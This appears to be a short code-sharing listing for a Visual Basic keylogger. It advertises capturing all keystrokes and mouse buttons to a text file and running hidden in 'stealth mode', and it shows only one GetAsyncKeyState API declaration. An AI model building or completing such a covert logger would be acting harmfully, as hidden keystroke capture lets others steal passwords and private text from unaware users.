
Receives keystrokes from user, including mouse buttons and all keys. Writes all input to a text file and can be hidden in stealth mode! ONLY ONE API CALL WITH EASY TO FOLLOW CODE! Votes and comments are strongly encouraged and appreciated.
API DeclarationsPrivate Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer